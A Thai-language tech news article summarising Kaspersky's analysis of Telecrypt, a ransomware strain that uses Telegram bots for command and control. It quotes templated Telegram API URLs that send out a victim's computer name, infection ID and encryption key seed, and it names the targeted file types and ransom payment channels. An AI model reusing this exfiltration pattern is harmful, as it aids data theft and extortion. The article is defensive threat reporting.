Breaking News

พบ Ransomware ตัวใหม่ ใช้ Telegram เป็น C&C Server

kaspersky_logo

นักวิจัยด้านความมั่นคงปลอดภัยจาก Kaspersky Lab ออกมาเปิดเผยถึง Ransomware ตัวใหม่ล่าสุด ชื่อว่า Telecrypt ซึ่งใช้ช่องทางของ Telegram แอพพลิเคชันสำหรับรับส่งข้อความที่มีความมั่นคงปลอดภัยสูง ในการส่งข้อมูลระหว่างมัลแวร์และแฮ็คเกอร์

Credit: Nicescene/ShutterStock
Credit: Nicescene/ShutterStock

Telecrypt ถูกพัฒนาขึ้นโดยใช้ภาษา Delphi ซึ่ง Binary มีขนาดเพียง 3 MB เท่านั้น หลังจากที่ Telecrypt ถูกติดตั้งลงบนเครื่องของเหยื่อแล้ว มันจะทำการสร้าง Telegram Bot ผ่านทาง Telegram API ซึ่ง Bot แต่ละตัวจะมี Token ID ที่ได้จาก API เป็นของตัวเอง

หลังจากที่เหยื่อกดรัน Telecrypt Binary ตัว Telegram Bot จะทำการ Ping ไปยัง Telegram API ผ่านทาง https://api.telegram.org/bot/GetMe เพื่อให้มั่นใจว่า Telegram Bot ยังคงทำงานได้ และไม่ถูก Telegram Admin จัดการ จากนั้น Telecrypt จะใช้โปรโตคอลของ Telegram ในการส่งข้อความผ่านเข้าไปยังช่องทางของ Telegram โดยใช้ Token ID ที่ได้รับมากในตอนแรก ซึ่งข้อความที่ส่งออกไปประกอบด้วย Computer Name, Infection ID และ Key Seed ซึ่งเป็นชุดตัวเลขที่ใช้เป็นกุญแจสำหรับเข้ารหัสไฟล์ข้อมูล

https://api.telegram.org/bot< token >/sendmessage?chat_id=< chat >&text=< computer_name >_< infection_id >_< key_seed >

ถัดมา Telecrypt จะทำการค้นหาไฟล์ข้อมูล ได้แก่ DOC, DOCX, XLS, XLSX, JPG, JPEG, PNG, DT, DBF, CD และ PDF เพื่อทำการเข้ารหัส ซึ่งบางเวอร์ชันจะไม่ใส่นามสกุลใดต่อท้ายไฟล์ แต่บางเวอร์ชันจะใส่นามสกุล .Xcri เพิ่มเข้าไป เมื่อเข้ารหัสไฟล์ทั้งหมดเสร็จเรียบร้อย Telecrypt จะส่งข้อความไปช่องทางเดิม แต่เพิ่มพารามิเตอร์ Stop เข้าไปด้วย

https://api.telegram.org/bot< token >/sendmessage?chat_id=< chat >&text=< computer_name >_< infection_id >_< key_seed >stop

จากนั้น Telecrypt จะดาวน์โหลดไฟล์ Xhelp.exe มาติดตั้งลงบนเครื่องของเหยื่อเพื่อแสดงข้อความเรียกค่าไถ่ดังรูปด้านล่าง

ข้อความเรียกค่าไถ่
ข้อความเรียกค่าไถ่
ระบุให้ชำระเงินผ่านทาง Yandex.Money หรือ Qiwi
ระบุให้ชำระเงินผ่านทาง Yandex.Money หรือ Qiwi
หลังปลดรหัสจะระบุข้อความ "ขอบคุณที่ช่วยสนับสนุนเงินทุนให้แก่โปรแกรมเมอร์ตัวน้อยๆ "
หลังปลดรหัสจะระบุข้อความ “ขอบคุณที่ช่วยสนับสนุนเงินทุนให้แก่โปรแกรมเมอร์ตัวน้อยๆ “

ข้อความเรียกค่าไถ่ถูกเขียนในภาษารัสเซีย และเรียกร้องเงินจำนวน 5,000 Rubles หรือประมาณ 2,800 บาท เพื่อปลดรหัสไฟล์ โดยให้ชำระเงินผ่านทาง Yandex.Money หรือ Qiwi ซึ่งเป็นช่องทางการชำระเงินยอดนิยมของรัสเซีย

ที่มา: https://securelist.com/blog/research/76558/the-first-cryptor-to-exploit-telegram/


About techtalkthai

ทีมงาน TechTalkThai เป็นกลุ่มบุคคลที่ทำงานในสาย Enterprise IT ที่มีความเชี่ยวชาญทางด้าน Network, Security, Server, Storage, Operating System และ Virtualization มารวมตัวกันเพื่ออัพเดตข่าวสารทางด้าน Enterprise IT ให้แก่ชาว IT ในไทยโดยเฉพาะ

Check Also

TechTalk Webinar: รู้จัก NEXtier Cloud ERP สูตรลับการติดตั้งระบบ SAP Business One เพื่อใช้บริหารธุรกิจรวดเร็วสุดใน 7 วัน โดย Nexus-SR

ขอเรียนเชิญเจ้าของกิจการ, ผู้บริหารธุรกิจ และผู้จัดการ IT ทุกท่าน ที่สนใจระบบบริหารธุรกิจครบวงจร เข้าร่วมฟัง TechTalk Webinar ในหัวข้อเรื่อง "รู้จัก NEXtier Cloud ERP สูตรลับการติดตั้งระบบ SAP Business One เพื่อใช้บริหารธุรกิจรวดเร็วสุดใน 7 วัน โดย Nexus-SR" เพื่อรู้จักกับโซลูชั่น NEXtier Cloud ERP power by SAP Business One ระบบ ERP ที่ออกแบบพิเศษเพื่อรองรับการบริหารธุรกิจสำหรับทุกกลุ่มธุรกิจ สนับสนุนการบริหารธุรกิจให้สามารถลดต้นทุน และเพิ่มกำไร รวมถึงรองรับเอกสารภาษี พร้อมทั้งกรณีศึกษาการวางระบบเพื่อใช้งานรวดเร็วที่สุดใน 7 วัน ในวันอังคารที่ 3 ธันวาคม 2019 เวลา 14.00 – 15.30 น. โดยมีกำหนดการและวิธีการลงทะเบียนดังนี้

Forescout เปิดตัวบริการ eyeSegment ทำ Nework Segmentation ได้ผ่าน Cloud

Forescout Technologies ผู้นำเทคโนโลยีด้าน Device Visibility & Control wด้ออกมาประกาศเปิดตัวบริการในการทำ Network Segmentation ผ่าน Cloud ภายใต้ชื่อ eyeSegment เพื่อให้ธุรกิจองค์กรสามารถจำแนกประเภทและจัดแบ่งกลุ่มอุปกรณ์ เพื่อทำการควบคุมนโยบายการเชื่อมต่อเครือข่ายได้ครอบคลุมสำหรับทั้ง Campus Network, Data Center, Cloud และ Operational Technology (OT) โดยมีความสามารถดังต่อไปนี้